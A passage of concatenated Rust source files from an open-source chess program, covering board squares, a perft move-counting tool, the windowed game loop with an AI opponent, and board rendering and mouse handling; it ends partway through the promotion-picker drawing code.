    /// `true` when any contained move targets `sq`.
    pub fn has_target_sq(&self, sq: Square) -> bool {
        self.iter().any(|m| m.to == sq)
    }
    /// A list pre-sized for a typical position's move count.
    pub fn new() -> Self {
        Self::with_capacity(256)
    }
    /// A list with room for `capacity` moves before reallocating.
    pub fn with_capacity(capacity: usize) -> Self {
        Self(Vec::with_capacity(capacity))
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/square.rs | chrs-lib/src/data/square.rs | use std::convert::{Into, TryFrom};
use strum_macros::{Display, EnumIter, EnumString};
// Declares an enum and, alongside it, a `TryFrom<usize>` impl that maps a
// discriminant value back to the matching variant (used below for `Square`).
macro_rules! make_enum {
    ($(#[$meta:meta])* $vis:vis enum $name:ident {
        $($(#[$vmeta:meta])* $vname:ident $(= $val:expr)?,)*
    }) => {
        $(#[$meta])*
        $vis enum $name {
            $($(#[$vmeta])* $vname $(= $val)?,)*
        }
        impl TryFrom<usize> for $name {
            // NOTE(review): the error type and message are hard-coded to the
            // Square case, so this macro only suits `Square`-like enums here.
            type Error = SquareFromUsizeErr;
            fn try_from(v: usize) -> Result<Self, Self::Error> {
                match v {
                    // Compare against each variant's discriminant in turn.
                    $(x if x == $name::$vname as usize => Ok($name::$vname),)*
                    _ => Err(SquareFromUsizeErr(format!("failed to convert {:?} to Square", v))),
                }
            }
        }
    }
}
// The 64 board squares, A1 = 0 through H8 = 63, rank-major from White's side.
// `EnumString`/`Display` (via strum) give case-insensitive lowercase textual
// forms such as "e4"; `TryFrom<usize>` comes from the macro above.
make_enum! {
    #[repr(u8)]
    #[derive(Ord, PartialOrd, Eq, PartialEq, Debug, Clone, Copy, EnumIter, EnumString, Display)]
    #[strum(ascii_case_insensitive, serialize_all = "lowercase")]
    pub enum Square {
        A1, B1, C1, D1, E1, F1, G1, H1,
        A2, B2, C2, D2, E2, F2, G2, H2,
        A3, B3, C3, D3, E3, F3, G3, H3,
        A4, B4, C4, D4, E4, F4, G4, H4,
        A5, B5, C5, D5, E5, F5, G5, H5,
        A6, B6, C6, D6, E6, F6, G6, H6,
        A7, B7, C7, D7, E7, F7, G7, H7,
        A8, B8, C8, D8, E8, F8, G8, H8,
    }
}
use Square::*;
// Lookup table mapping each square to its vertical mirror (rank flipped,
// file preserved): A1 <-> A8, B2 <-> B7, and so on.
#[rustfmt::skip]
const MIRROR: [Square; 64] =
    [
    A8, B8, C8, D8, E8, F8, G8, H8,
    A7, B7, C7, D7, E7, F7, G7, H7,
    A6, B6, C6, D6, E6, F6, G6, H6,
    A5, B5, C5, D5, E5, F5, G5, H5,
    A4, B4, C4, D4, E4, F4, G4, H4,
    A3, B3, C3, D3, E3, F3, G3, H3,
    A2, B2, C2, D2, E2, F2, G2, H2,
    A1, B1, C1, D1, E1, F1, G1, H1,
    ];
impl TryFrom<(usize, usize)> for Square {
type Error = SquareFromPairErr;
fn try_from(pos: (usize, usize)) -> Result<Self, Self::Error> {
match (pos.1 * 8 + pos.0).try_into() {
Ok(sq) => Ok(sq),
Err(err) => Err(SquareFromPairErr(format!(
"failed to convert {:?} to Square: {}",
pos, err.0
))),
}
}
}
impl Into<(usize, usize)> for Square {
fn into(self) -> (usize, usize) {
let s = self as usize;
(s % 8, s / 8)
}
}
impl Square {
    /// The square reflected across the board's horizontal mid-line
    /// (A1 <-> A8, etc.): same file, rank seen from the other side.
    pub const fn mirror(&self) -> Self {
        MIRROR[*self as usize]
    }
}
/// Error produced when a `usize` discriminant is outside the 0..64 range.
#[derive(Debug)]
pub struct SquareFromUsizeErr(String);
/// Error produced when an `(x, y)` pair does not map to a valid square.
#[derive(Debug)]
pub struct SquareFromPairErr(String);
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-perft/src/main.rs | chrs-perft/src/main.rs | #![allow(warnings, unused)]
use chrs_lib::data::{BoardConfig, BoardPiece, Color, Move, Square};
use chrs_lib::generator::MoveGenerator;
use chrs_lib::zobrist::hash;
use std::env;
use std::str::FromStr;
use std::time::Instant;
/// Count leaf nodes of the legal-move tree to `depth` plies ("perft").
/// With `divide` set, per-root-move subtotals are printed (perft-divide).
/// Also cross-checks the incrementally updated zobrist hash after each undo.
fn perft_impl(depth: usize, config: &mut BoardConfig, gen: &MoveGenerator, divide: bool) -> usize {
    // A position at depth 0 is itself one leaf.
    if depth == 0 {
        return 1;
    }
    let to_move = config.get_active_color();
    let moves = gen.gen_all_moves(to_move, config, false);
    // Bulk-count shortcut: at depth 1 every generated move is a leaf.
    if depth == 1 {
        return moves.len();
    }
    let mut nodes = 0;
    for m in moves.iter() {
        // Hash recomputed from scratch; compared after undo to validate the
        // incremental update performed by make_move/undo_commit.
        let expected = hash(config);
        if let Some(commit) = config.make_move(*m) {
            let subtree = perft_impl(depth - 1, config, gen, false);
            if divide {
                println!("{} {}", commit.m.to_string().to_lowercase(), subtree);
            }
            nodes += subtree;
            config.undo_commit(&commit);
            assert_eq!(expected, config.get_hash());
        }
    }
    nodes
}
fn main() {
let depth = std::env::args()
.nth(1)
.expect("Depth not provided")
.parse()
.unwrap();
let fen = std::env::args().nth(2).expect("Fen not provided");
let moves = std::env::args().nth(3).unwrap_or_default();
let mut config = BoardConfig::from_fen_str(&fen);
let gen = MoveGenerator::default();
if moves != "" {
for i in moves.split(' ').collect::<Vec<&str>>() {
let chars = i.chars();
let from: Square =
Square::from_str(&chars.clone().take(2).collect::<String>()).unwrap();
let to: Square =
Square::from_str(&chars.clone().skip(2).take(2).collect::<String>()).unwrap();
let mut m = Move::infer(from, to, &config);
if m.is_empty_prom() {
let mut p = format!("{}", chars.clone().last().unwrap());
if config.get_active_color() == Color::White {
p = p.to_uppercase();
}
let prom = BoardPiece::from_str(&p).unwrap();
m.set_prom(prom);
}
config.make_move(m);
}
}
let now = Instant::now();
let c = perft_impl(depth, &mut config, &gen, true);
let elapsed = now.elapsed();
println!("\n{}", c);
println!("\nTime Take: {:?}", elapsed);
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/app.rs | chrs/src/app.rs | use crate::board::{events::BoardEvent, Board};
use crate::ui::GuiFramework;
use chrs_lib::ai::{NegaMaxAI, AI};
use chrs_lib::data::{BoardConfig, Color, GameState, MoveList, Square};
use chrs_lib::generator::MoveGenerator;
use log;
use pixels::{Error, Pixels, SurfaceTexture};
use std::cell::RefCell;
use std::rc::Rc;
use winit::dpi::LogicalSize;
use winit::event::Event;
use winit::event_loop::{ControlFlow, EventLoop};
use winit::window::WindowBuilder;
const WIN_WIDTH: u32 = 1280;
const WIN_HEIGHT: u32 = 720;
/// Zero-sized entry point; `App::run` hosts the whole application loop.
pub struct App;
impl App {
    /// Build the window, graphics surface and game state, then enter the
    /// winit event loop. On native targets this call never returns; on
    /// wasm32 the canvas is attached to the page body first.
    pub async fn run() {
        let event_loop = EventLoop::new();
        let builder = WindowBuilder::new();
        let window_size = LogicalSize::new(WIN_WIDTH, WIN_HEIGHT);
        let window = builder
            .with_maximized(true)
            .with_title("chess-rs")
            .with_inner_size(window_size)
            .build(&event_loop)
            .unwrap();
        // Rc so the wasm resize closure below can hold its own handle.
        let window = Rc::new(window);
        #[cfg(target_arch = "wasm32")]
        {
            use wasm_bindgen::JsCast;
            use winit::platform::web::WindowExtWebSys;
            // Retrieve current width and height dimensions of browser client window
            let get_window_size = || {
                let client_window = web_sys::window().unwrap();
                LogicalSize::new(
                    client_window.inner_width().unwrap().as_f64().unwrap(),
                    client_window.inner_height().unwrap().as_f64().unwrap(),
                )
            };
            let window = Rc::clone(&window);
            // Initialize winit window with current dimensions of browser client
            window.set_inner_size(get_window_size());
            let client_window = web_sys::window().unwrap();
            // Attach winit canvas to body element
            web_sys::window()
                .and_then(|win| win.document())
                .and_then(|doc| doc.body())
                .and_then(|body| {
                    body.append_child(&web_sys::Element::from(window.canvas()))
                        .ok()
                })
                .expect("couldn't append canvas to document body");
            // Listen for resize event on browser client. Adjust winit window dimensions
            // on event trigger
            let closure =
                wasm_bindgen::closure::Closure::wrap(Box::new(move |_e: web_sys::Event| {
                    let size = get_window_size();
                    window.set_inner_size(size)
                }) as Box<dyn FnMut(_)>);
            client_window
                .add_event_listener_with_callback("resize", closure.as_ref().unchecked_ref())
                .unwrap();
            closure.forget();
        }
        // Game/UI state owned by the event-loop closure below.
        let mut board = Board::default();
        let mut config = BoardConfig::default();
        // let config = BoardConfig::from_fen_str(
        //     "r3k2r/p1ppqpb1/bn2pnp1/3PN3/1p2P3/2N2Q1p/PPPBBPPP/R3K2R w KQkq -",
        // );
        let generator = MoveGenerator::default();
        let mut ai = NegaMaxAI::default();
        // Pixel surface sized to the board's drawing area, plus the egui layer.
        let (mut pixels, mut framework) = {
            let window_size = window.inner_size();
            let surface_texture =
                SurfaceTexture::new(window_size.width, window_size.height, window.as_ref());
            let board_size = board.get_draw_area_side();
            let pixels = Pixels::new_async(board_size, board_size, surface_texture)
                .await
                .expect("Pixels Error");
            let framework = GuiFramework::new(
                &event_loop,
                window_size.width,
                window_size.height,
                window.scale_factor() as f32,
                &pixels,
            );
            (pixels, framework)
        };
        // Legal moves for the currently picked piece (None until one is picked).
        let mut moves: Option<MoveList> = None;
        let mut picked_sq: Option<Square> = None;
        event_loop.run(move |event, _, control_flow| {
            control_flow.set_poll();
            match event {
                Event::WindowEvent { event, .. } => {
                    // Update egui inputs
                    if !framework.handle_event(&event) {
                        use winit::event::WindowEvent::*;
                        match event {
                            CloseRequested => {
                                log::info!("The close Button was pressed.");
                                control_flow.set_exit();
                            }
                            Resized(size) => {
                                if let Err(err) = pixels.resize_surface(size.width, size.height) {
                                    log::error!("Pixels failed to resize error: {}", err);
                                    control_flow.set_exit();
                                }
                                framework.resize(size.width, size.height);
                            }
                            ScaleFactorChanged {
                                scale_factor,
                                new_inner_size: _,
                            } => {
                                framework.scale_factor(scale_factor);
                            }
                            MouseInput { state, button, .. } => {
                                let board_event = BoardEvent::MouseInput { state, button };
                                board.handle_event(board_event, &config);
                            }
                            CursorMoved { position, .. } => {
                                // Outside the pixel surface counts as the
                                // cursor leaving the board.
                                if let Ok(pos) = pixels.window_pos_to_pixel(position.into()) {
                                    let board_event = BoardEvent::CursorMoved { position: pos };
                                    board.handle_event(board_event, &config);
                                } else {
                                    let board_event = BoardEvent::CursorLeft;
                                    board.handle_event(board_event, &config);
                                }
                            }
                            _ => {}
                        }
                    }
                }
                Event::MainEventsCleared => {
                    // Game tick: Black is played by the AI, White by the user.
                    if config.get_state() == GameState::InPlay {
                        let turn = config.get_active_color();
                        if turn == Color::Black {
                            let ai_move = ai.get_best_move(&config, &generator);
                            if let Some(ai_move) = ai_move {
                                log::info!("AI response {:?}", ai.get_stats());
                                config.apply_move(ai_move);
                            } else {
                                log::info!("AI did not generate any move");
                            }
                        } else {
                            if let Some(user_move) = board.get_user_move() {
                                // NOTE(review): assumes `moves` was populated
                                // when the piece was picked up; a user move
                                // without a prior pick would panic — confirm.
                                if moves.as_ref().unwrap().has_target_sq(user_move.to) {
                                    if !user_move.is_empty_prom() {
                                        config.apply_move(user_move);
                                        board.clear_user_move();
                                    }
                                }
                            }
                            // Regenerate the highlight move list whenever a
                            // different piece is picked up.
                            let sq = board.get_picked_piece();
                            if sq != picked_sq {
                                picked_sq = sq;
                                if let Some(sq) = sq {
                                    let p = config.get_at_sq(sq).unwrap();
                                    moves =
                                        Some(generator.gen_piece_moves(p, sq, &mut config, false));
                                }
                            }
                        }
                        generator.update_state(&mut config);
                    }
                    window.request_redraw();
                }
                Event::RedrawRequested(_) => {
                    // Redraw here
                    board.draw(pixels.frame_mut(), &generator, &config, &moves);
                    // Prepare egui
                    framework.prepare(&window, &mut config, &mut ai);
                    // Render everything together
                    let render_result = pixels.render_with(|encoder, render_target, context| {
                        // Render the board texture
                        context.scaling_renderer.render(encoder, render_target);
                        // Render egui
                        framework.render(encoder, render_target, context);
                        Ok(())
                    });
                    if let Err(err) = render_result {
                        log::error!("pixels.render_with failed: {err}");
                        *control_flow = ControlFlow::Exit;
                        return;
                    }
                }
                _ => (),
            }
        });
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/main.rs | chrs/src/main.rs | #![allow(warnings, unused)]
mod app;
mod board;
mod cache;
mod ui;
use app::App;
use pixels::Error;
/// Entry point: install per-target logging/panic hooks, then run the app
/// (spawned on the browser's microtask queue for wasm, blocked on natively).
fn main() {
    #[cfg(target_arch = "wasm32")]
    {
        std::panic::set_hook(Box::new(console_error_panic_hook::hook));
        console_log::init_with_level(log::Level::Info).expect("error initializing logger");
        wasm_bindgen_futures::spawn_local(App::run());
    }
    #[cfg(not(target_arch = "wasm32"))]
    {
        std::env::set_var("RUST_BACKTRACE", "1");
        pretty_env_logger::init();
        pollster::block_on(App::run());
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/cache.rs | chrs/src/cache.rs | use std::collections::HashMap;
/// Simple string-keyed memo cache that hands out clones of stored values.
#[derive(Debug)]
pub struct Cache<T: Clone> {
    // Backing map; keys are caller-chosen identifiers (e.g. sprite names).
    store: HashMap<String, T>,
}
impl<T: Clone> Default for Cache<T> {
fn default() -> Self {
Cache {
store: HashMap::new(),
}
}
}
impl<T: Clone> Cache<T> {
    /// Look up `id`; on a hit, log it and return a clone of the value.
    pub fn get(&self, id: &str) -> Option<T> {
        let hit = self.store.get(id)?;
        log::trace!("Found {} in cache", id);
        Some(hit.clone())
    }
    /// Store a clone of `v` under `id`, replacing any previous entry.
    pub fn put(&mut self, id: &str, v: &T) {
        self.store.insert(id.to_string(), v.clone());
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/embed.rs | chrs/src/board/embed.rs | use rust_embed::RustEmbed;
/// Piece sprites (SVG) embedded into the binary at compile time.
#[derive(RustEmbed)]
#[folder = "assets/pieces"]
pub struct SvgSprites;
/// Font files embedded into the binary at compile time.
#[derive(RustEmbed)]
#[folder = "assets/fonts"]
pub struct EmbeddedFonts;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/mod.rs | chrs/src/board/mod.rs | mod embed;
pub mod events;
use crate::cache::Cache;
use chrs_lib::data::{BoardConfig, BoardPiece, Color, GameState, Move, MoveList, Square};
use chrs_lib::generator::MoveGenerator;
use embed::{EmbeddedFonts, SvgSprites};
use events::{BoardEvent, ElementState, MouseButton, MouseState};
use fontdue::{
layout::{CoordinateSystem, HorizontalAlign, Layout, LayoutSettings, TextStyle},
Font,
};
use resvg::{tiny_skia, usvg};
// Promotion choices offered in the overlay, drawn left to right.
const W_PROM_OPTS: [BoardPiece; 4] = [
    BoardPiece::WhiteKnight,
    BoardPiece::WhiteBishop,
    BoardPiece::WhiteRook,
    BoardPiece::WhiteQueen,
];
const B_PROM_OPTS: [BoardPiece; 4] = [
    BoardPiece::BlackKnight,
    BoardPiece::BlackBishop,
    BoardPiece::BlackRook,
    BoardPiece::BlackQueen,
];
/// Renders the chess board, pieces and promotion overlay, and turns raw
/// window input into a user `Move`.
pub struct Board {
    // Pixel length of the (square) board area, excluding the ruler strip.
    side_length: u32,
    // Width in pixels of the file/rank ruler drawn beside/below the board.
    ruler_offset: u32,
    // RGBA colors: light squares, dark squares, ruler text, legal-move
    // highlight, and king-in-check highlight.
    white_color: [u8; 4],
    black_color: [u8; 4],
    ruler_color: [u8; 4],
    highlight_color: [u8; 4],
    red_highlight_color: [u8; 4],
    // Font used for ruler labels and overlay text.
    font: Font,
    // Parsed SVG trees keyed by sprite file name.
    glyph_cache: Cache<usvg::Tree>,
    // Rasterized ruler characters keyed by the character itself.
    raster_cache: Cache<tiny_skia::Pixmap>,
    // Square of the piece currently being dragged, if any.
    picked_piece: Option<Square>,
    mouse_state: MouseState,
    // Move assembled from the last drag, pending consumption by the app.
    user_move: Option<Move>,
    // Promotion/status overlay rectangle as (x, y, w, h) in pixels.
    overlay_xywh: (f32, f32, f32, f32),
}
impl Default for Board {
    /// 720px board with a 20px ruler strip and the overlay centred on it.
    #[rustfmt::skip]
    fn default() -> Self {
        let font_src = Self::get_font_src();
        let font = fontdue::Font::from_bytes(font_src, fontdue::FontSettings::default()).unwrap();
        // One board square in pixels, and the full drawing-area side
        // (board + ruler) used to centre the 4-square-wide overlay.
        let check_side = 720.0 / 8.0;
        let size = 720.0 + 20.0;
        Board {
            side_length: 720,
            ruler_offset: 20,
            white_color: [0xe3, 0xc1, 0x6f, 0xff],
            black_color: [0xb8, 0x8b, 0x4a, 0xff],
            ruler_color: [0xff, 0xff, 0xff, 0xff],
            highlight_color: [0x3f, 0x7a, 0xd9, 0x40],
            red_highlight_color: [0xff, 0x20, 0x20, 0xff],
            font,
            glyph_cache: Cache::default(),
            raster_cache: Cache::default(),
            mouse_state: MouseState::default(),
            picked_piece: None,
            user_move: None,
            overlay_xywh: (size/2.0-2.0*check_side, size/2.0-0.5*check_side, 4.0*check_side, check_side),
        }
    }
}
impl Board {
    /// The move assembled from the user's last drag, if any (it may still be
    /// an "empty" promotion awaiting a piece choice).
    pub fn get_user_move(&mut self) -> Option<Move> {
        self.user_move
    }
    /// Discard the pending user move.
    pub fn clear_user_move(&mut self) {
        self.user_move = None
    }
    /// Square of the piece currently being dragged, if any.
    pub fn get_picked_piece(&self) -> Option<Square> {
        self.picked_piece
    }
    /// Map a window-pixel position to coordinates local to the promotion
    /// overlay, or `None` when the position lies outside it.
    fn get_pos_prom_box(&self, pos: &(usize, usize)) -> Option<(usize, usize)> {
        let inside = pos.0 > self.overlay_xywh.0 as usize
            && pos.0 < (self.overlay_xywh.0 + self.overlay_xywh.2) as usize
            && pos.1 > self.overlay_xywh.1 as usize
            && pos.1 < (self.overlay_xywh.1 + self.overlay_xywh.3) as usize;
        if inside {
            let x = pos.0 - self.overlay_xywh.0 as usize;
            let y = pos.1 - self.overlay_xywh.1 as usize;
            return Some((x, y));
        }
        None
    }
    /// Feed a window event into the board: updates mouse state, resolves a
    /// pending promotion via the overlay, and tracks piece pick-up / drop
    /// to build `user_move`.
    pub fn handle_event(&mut self, e: BoardEvent, config: &BoardConfig) {
        self.update_mouse_state(e);
        // Ignore board interaction once the game is over.
        if config.get_state() != GameState::InPlay {
            return;
        }
        // A promotion without a chosen piece is pending: the next left click
        // either picks a piece from the overlay or cancels the move.
        if let Some(m) = &self.user_move {
            if m.is_empty_prom() {
                if self.mouse_state.get_is_left_pressed() {
                    let pos = self.mouse_state.get_pos();
                    if let Some((x, _)) = self.get_pos_prom_box(&pos) {
                        // Each overlay cell is one square (overlay height) wide.
                        let i = x / self.overlay_xywh.3 as usize;
                        let prom = match config.get_active_color() {
                            Color::White => W_PROM_OPTS[i],
                            Color::Black => B_PROM_OPTS[i],
                        };
                        self.user_move = Some(Move::new_prom(m.from, m.to, m.p, m.capture, prom));
                    } else {
                        self.clear_user_move();
                    }
                }
                return;
            }
        }
        let sq = self.get_sq_from_pointer();
        // Press: pick up one of the active side's pieces.
        if self.mouse_state.get_is_left_pressed() {
            if let None = self.picked_piece {
                if let Some(p) = config.get_at_sq(sq) {
                    if p.get_color() == config.get_active_color() {
                        self.picked_piece = Some(sq);
                    }
                }
            }
        }
        // Release: drop the piece and infer the resulting move.
        if !self.mouse_state.get_is_left_pressed() {
            if let Some(prev) = self.picked_piece {
                self.user_move = Some(Move::infer(prev, sq, config));
                self.picked_piece = None;
            }
        }
        // Leaving the board cancels the drag.
        if !self.mouse_state.get_is_cursor_in() {
            self.picked_piece = None;
        }
    }
    /// Render everything into `frame` (an RGBA buffer of side
    /// `get_draw_area_side()`): ruler, squares, legal-move and check
    /// highlights, pieces, the dragged piece, and any overlay.
    pub fn draw(
        &mut self,
        frame: &mut [u8],
        gen: &MoveGenerator,
        config: &BoardConfig,
        moves: &Option<MoveList>,
    ) {
        let size = self.get_draw_area_side();
        let mut pixmap = tiny_skia::Pixmap::new(size, size).unwrap();
        let mut white_paint = tiny_skia::Paint::default();
        white_paint.set_color_rgba8(
            self.white_color[0],
            self.white_color[1],
            self.white_color[2],
            self.white_color[3],
        );
        let mut black_paint = tiny_skia::Paint::default();
        black_paint.set_color_rgba8(
            self.black_color[0],
            self.black_color[1],
            self.black_color[2],
            self.black_color[3],
        );
        let mut ruler_paint = tiny_skia::Paint::default();
        ruler_paint.set_color_rgba8(
            self.ruler_color[0],
            self.ruler_color[1],
            self.ruler_color[2],
            self.ruler_color[3],
        );
        let mut highlight_paint = tiny_skia::Paint::default();
        highlight_paint.set_color_rgba8(
            self.highlight_color[0],
            self.highlight_color[1],
            self.highlight_color[2],
            self.highlight_color[3],
        );
        let mut red_highlight_paint = tiny_skia::Paint::default();
        red_highlight_paint.set_color_rgba8(
            self.red_highlight_color[0],
            self.red_highlight_color[1],
            self.red_highlight_color[2],
            self.red_highlight_color[3],
        );
        let check_side = self.get_check_side();
        let glyph_width = (check_side * 0.75) as u32;
        // Tick marks for the ruler: a short horizontal and vertical stroke.
        let hline = {
            let mut pb = tiny_skia::PathBuilder::new();
            pb.line_to(self.ruler_offset as f32, 0.0);
            pb.finish().unwrap()
        };
        let vline = {
            let mut pb = tiny_skia::PathBuilder::new();
            pb.line_to(0.0, self.ruler_offset as f32);
            pb.finish().unwrap()
        };
        // Rank digits (8..1 top to bottom) and file letters (A..H).
        for i in 0..8 {
            let stroke = tiny_skia::Stroke::default();
            {
                // Y-axis
                let t1 =
                    tiny_skia::Transform::from_translate(0.0, (1 + i) as f32 * check_side as f32);
                pixmap.stroke_path(&hline, &ruler_paint, &stroke, t1, None);
                let t2 = tiny_skia::Transform::from_translate(
                    self.ruler_offset as f32 * 0.2,
                    i as f32 * check_side as f32 + check_side * 0.45,
                );
                self.draw_char(('1' as u8 + (7 - i)) as char, 20.0, t2, &mut pixmap);
            }
            {
                // X-axis
                let t1 = tiny_skia::Transform::from_translate(
                    self.ruler_offset as f32 + i as f32 * check_side as f32,
                    self.side_length as f32,
                );
                pixmap.stroke_path(&vline, &ruler_paint, &stroke, t1, None);
                let t2 = tiny_skia::Transform::from_translate(
                    self.ruler_offset as f32 + i as f32 * check_side as f32 + check_side * 0.45,
                    self.side_length as f32 + self.ruler_offset as f32 * 0.2,
                );
                self.draw_char(('A' as u8 + i) as char, 17.0, t2, &mut pixmap);
            }
        }
        // Draw the checkboard and all the arrangement of pieces
        let rect = tiny_skia::Rect::from_xywh(0.0, 0.0, check_side, check_side).unwrap();
        for y in 0..8 {
            for x in 0..8 {
                let paint = if x % 2 == 0 {
                    if y % 2 == 0 {
                        &black_paint
                    } else {
                        &white_paint
                    }
                } else {
                    if y % 2 == 0 {
                        &white_paint
                    } else {
                        &black_paint
                    }
                };
                // Rank 0 is drawn at the bottom, hence the (7 - y) flip.
                let t = tiny_skia::Transform::from_translate(
                    x as f32 * check_side + self.ruler_offset as f32,
                    (7 - y) as f32 * check_side,
                );
                pixmap.fill_rect(rect, paint, t, None);
                // Highlight squares the picked piece can move to.
                if let Some(_) = self.picked_piece {
                    if moves.is_some()
                        && moves
                            .as_ref()
                            .unwrap()
                            .has_target_sq((x, y).try_into().unwrap())
                    {
                        pixmap.fill_rect(rect, &highlight_paint, t, None);
                    }
                }
                // The dragged piece is drawn at the cursor later, not here.
                if let Some(picked_sq) = self.picked_piece {
                    if (x, y) == picked_sq.into() {
                        continue;
                    }
                }
                if let Some(p) = config.get_at_sq((x, y).try_into().unwrap()).to_owned() {
                    // A king in check gets a red square underneath it.
                    if (p == BoardPiece::WhiteKing || p == BoardPiece::BlackKing)
                        && config.is_king_in_check(gen, p.get_color())
                    {
                        pixmap.fill_rect(rect, &red_highlight_paint, t, None);
                    }
                    let tree = self.get_glyph_tree(&p);
                    let transform = tiny_skia::Transform::from_translate(
                        // TODO: Fix magic number
                        x as f32 * check_side + self.ruler_offset as f32 + check_side / 8.0,
                        (7 - y) as f32 * check_side + check_side / 8.0,
                    );
                    let fit = usvg::FitTo::Width(glyph_width);
                    resvg::render(&tree, fit, transform, pixmap.as_mut());
                }
            }
        }
        // Promotion picker overlay while the user has not chosen a piece.
        if let Some(m) = self.user_move {
            if m.is_empty_prom() {
                let transform =
                    tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
                self.draw_prom_choice(config.get_active_color(), transform, &mut pixmap);
            }
        }
        // Draw the picked piece if any
        if let Some(sq) = self.picked_piece {
            let p = config.get_at_sq(sq).unwrap();
            let tree = self.get_glyph_tree(&p);
            let pos = self.mouse_state.get_pos();
            let y = pos.1;
            let x = pos.0;
            // Centre the glyph on the cursor.
            let transform = tiny_skia::Transform::from_translate(
                x as f32 - glyph_width as f32 / 2.0,
                y as f32 - glyph_width as f32 / 2.0,
            );
            let fit = usvg::FitTo::Width(glyph_width);
            resvg::render(&tree, fit, transform, pixmap.as_mut());
        }
        // Game-over banners.
        if let GameState::Mate(mate) = config.get_state() {
            let transform =
                tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
            self.draw_text(
                &format!("Check Mate: {}", mate),
                32.0,
                transform,
                &mut pixmap,
            )
        } else if config.get_state() == GameState::StaleMate {
            let transform =
                tiny_skia::Transform::from_translate(self.overlay_xywh.0, self.overlay_xywh.1);
            self.draw_text(&format!("It's a Stalemate"), 32.0, transform, &mut pixmap)
        }
        frame.copy_from_slice(pixmap.data());
    }
    /// Total pixel side of the drawing area (board plus ruler strip).
    pub fn get_draw_area_side(&self) -> u32 {
        self.side_length + self.ruler_offset
    }
    /// Pixel side of one board square.
    fn get_check_side(&self) -> f32 {
        (self.side_length / 8) as f32
    }
    /// Parsed SVG for a piece, loaded from the embedded assets and memoized
    /// in `glyph_cache`. Panics if the SVG fails to parse.
    fn get_glyph_tree(&mut self, p: &BoardPiece) -> usvg::Tree {
        let glyph_path = Board::get_glyph_path(p);
        match self.glyph_cache.get(&glyph_path) {
            Some(t) => t,
            None => {
                log::info!("Importing glyph {}", glyph_path);
                let str = Board::get_svg_src(&glyph_path);
                let t = usvg::Tree::from_str(&str, &usvg::Options::default()).unwrap_or_else(|e| {
                    log::error!("usvg::Tree::from_str: {}", e);
                    panic!();
                });
                self.glyph_cache.put(&glyph_path, &t);
                t
            }
        }
    }
    /// Sprite file name for a piece, derived from its `Display` impl.
    fn get_glyph_path(p: &BoardPiece) -> String {
        let s = format!("{}.svg", p);
        s.to_owned()
    }
    /// Fold a `BoardEvent` into the tracked mouse state.
    fn update_mouse_state(&mut self, e: BoardEvent) {
        match e {
            BoardEvent::MouseInput { button, state } => match button {
                MouseButton::Left => match state {
                    ElementState::Pressed => self.mouse_state.set_left_pressed(),
                    ElementState::Released => self.mouse_state.set_left_released(),
                },
                MouseButton::Right => match state {
                    ElementState::Pressed => self.mouse_state.set_right_pressed(),
                    ElementState::Released => self.mouse_state.set_right_released(),
                },
                _ => {}
            },
            BoardEvent::CursorMoved { position } => {
                self.mouse_state.set_cursor_in();
                // if position.0 as u32 > self.ruler_offset && (position.1 as u32) < self.side_length {
                let position = (position.0, position.1);
                self.mouse_state.update_pos(position);
                // }
            }
            BoardEvent::CursorLeft => {
                self.mouse_state.unset_cursor_in();
            }
        }
    }
    /// Board square under the cursor, clamping out-of-board positions onto
    /// the nearest edge square.
    fn get_sq_from_pointer(&self) -> Square {
        let pos = self.mouse_state.get_pos();
        let check_side = self.get_check_side() as usize;
        let off = self.ruler_offset as usize;
        let x = (pos.0.clamp(off, off + self.side_length as usize - 1) - off) / check_side as usize;
        let y = 7 - (pos.1.clamp(0, self.side_length as usize - 1) / check_side as usize);
        (x, y).try_into().unwrap()
    }
    /// Raw bytes of the embedded UI font.
    fn get_font_src() -> Vec<u8> {
        let filename = "Roboto-Bold.ttf";
        let content = EmbeddedFonts::get(filename).expect(&format!("{} not found", filename));
        content.data.as_ref().to_vec()
    }
    /// UTF-8 contents of an embedded SVG sprite.
    fn get_svg_src(filename: &str) -> String {
        let content = SvgSprites::get(filename).expect(&format!("{} not found", filename));
        let content = std::str::from_utf8(content.data.as_ref()).unwrap();
        content.to_string()
    }
    /// Paint the four-piece promotion picker for `color` into `pixmap` at
    /// transform `t`.
    fn draw_prom_choice(
        &mut self,
        color: Color,
        t: tiny_skia::Transform,
        pixmap: &mut tiny_skia::Pixmap,
    ) {
        let check_side = self.get_check_side();
        let mut pm =
            tiny_skia::Pixmap::new(self.overlay_xywh.2 as u32, self.overlay_xywh.3 as u32).unwrap();
        let glyph_width = (check_side * 0.75) as u32;
        let pieces = match color {
            Color::White => W_PROM_OPTS,
            Color::Black => B_PROM_OPTS,
        };
        pm.fill(tiny_skia::Color::WHITE);
        for (i, p) in pieces.iter().enumerate() {
